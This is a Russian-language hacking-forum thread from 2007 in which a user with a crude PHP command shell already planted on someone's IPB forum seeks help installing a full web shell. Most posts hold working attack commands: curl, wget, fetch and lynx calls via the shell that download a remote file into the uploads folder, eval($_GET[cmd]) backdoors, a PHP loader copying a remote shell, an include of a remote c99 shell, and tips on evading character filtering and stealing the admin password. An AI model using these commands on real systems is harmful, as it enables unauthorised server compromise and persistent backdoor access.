Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   загрузка шелла на зеноне (https://forum.antichat.xyz/showthread.php?t=47084)

ysmat 19.08.2007 19:04
загрузка шелла на зеноне
 
у меня на форуме есть примитивный шелл вида
"<? system(\$cmd); ?>"
требуется залить файл полноценного шелла в папку uploads
перепробовал все известные загрузчики

curl wget get links lynx fetch GET lwp-mirror
Код:
http://***********/forum/cache/lang_cache/ru/1.php?cmd=curl --output /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=wget -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=get http://files.adamant.ua/3824 > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=links -source "http://files.adamant.ua/3824" > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=lynx -source http://files.adamant.ua/3824 > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=fetch -o /***********/www/forum/uploads/2.php -p http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=wget -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=curl -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=fetch -o /***********/www/forum/uploads/2.php http://files.adamant.ua/3824
http://***********/forum/cache/lang_cache/ru/1.php?cmd=lynx -source "http://files.adamant.ua/3824" > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=links  -source "http://files.adamant.ua/3824" > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=GET http://files.adamant.ua/3824 > /***********/www/forum/uploads/2.php
http://***********/forum/cache/lang_cache/ru/1.php?cmd=lwp-mirror http://files.adamant.ua/3824 /***********/www/forum/uploads/2.php
ни один не сработал
хотя шелл cmd работает
файл 1.txt создается
_http://***********/forum/cache/lang_cache/ru/1.php?cmd=echo текст > /***********/www/forum/uploads/1.txt
может еще есть какие методы загрузки
форум ipb 2.1.4 и находится находиться на хостинге зенон

SanyaX 19.08.2007 19:09
Ты посмотри может там воще качалок нету. Или права на запись отсуствуют. Как писал уже качалки смотреть пример:which wget. И так и другие проверяешь.

fly 19.08.2007 19:20
создай файл abc.php
Затем впиши echo '<?php eval($_GET[cmd]);?>' в файл abc.php
то потом просто пиши
abc.php?cmd=$f=fopen($_GET[r],$_GET[rr]);$o=fopen($_GET[o],$_GET[oo]);while(!feof($f)){$row=fgets($f);fputs($o,$row);} &rr=r&oo=w+&r=http://www.yoursite.com/shell.txt&o=shell.php

ysmat 19.08.2007 22:00
не могу создать файл abc.php
с содержимым '<?php eval($_GET[cmd]);?>'
с простым текстом создается _http://*******/forum/cache/lang_cache/ru/1.php?cmd=echo текст > /*******/forum/uploads/abc.php
_http://*******/forum/cache/lang_cache/ru/1.php?cmd=echo '<?php eval($_GET[cmd]);?>' > /*******/forum/uploads/abc.php не проходит
вероятно не нравятся спец символы в '<?php eval($_GET[cmd]);?>'

NOmeR1 19.08.2007 22:08
Цитата:
Сообщение от fly
создай файл abc.php
Затем впиши echo '<?php eval($_GET[cmd]);?>' в файл abc.php
то потом просто пиши
abc.php?cmd=$f=fopen($_GET[r],$_GET[rr]);$o=fopen($_GET[o],$_GET[oo]);while(!feof($f)){$row=fgets($f);fputs($o,$row);} &rr=r&oo=w+&r=http://www.yoursite.com/shell.txt&o=shell.php
Зачем столько трудностей?
Содержание файла должно быть просто
PHP код:
<?
eval($_GET['cmd']);
?>
И вообще можно просто инклудить веб-шелл, например
PHP код:
<?
include('http://dermoshell.narod.ru/c99madshell.php');
?>

ysmat 19.08.2007 23:17
проблема в том что не получается вобще создать
файл с спец символами через строку браузера
например
http://**********/forum/cache/lang_cache/ru/1.php?cmd=echo текст > /**********/forum/uploads/2.php
все нормально на сервере создается файл 2.php с содержимым текст

http://**********/forum/cache/lang_cache/ru/1.php?cmd=echo <? eval($_GET['cmd']); ?> > /**********/forum/uploads/2.php
создается пустой файл 2.php код <? eval($_GET['cmd']); ?> не проходит

ysmat 20.08.2007 23:50
не проходят символы >< () причем перевод их в hex %3E%3C%28%29
не помогает как ето можно обойти

mister 30.08.2007 22:40
Код:
echo '<?php eval($_GET[\'cmd\']) ?>' > куда.php
обрати внимание на кавычки

Shagon 30.08.2007 23:39
Ммм а пасс админа если сныкать и залить из админки шелл в папку со смайлами?


Время: 07:30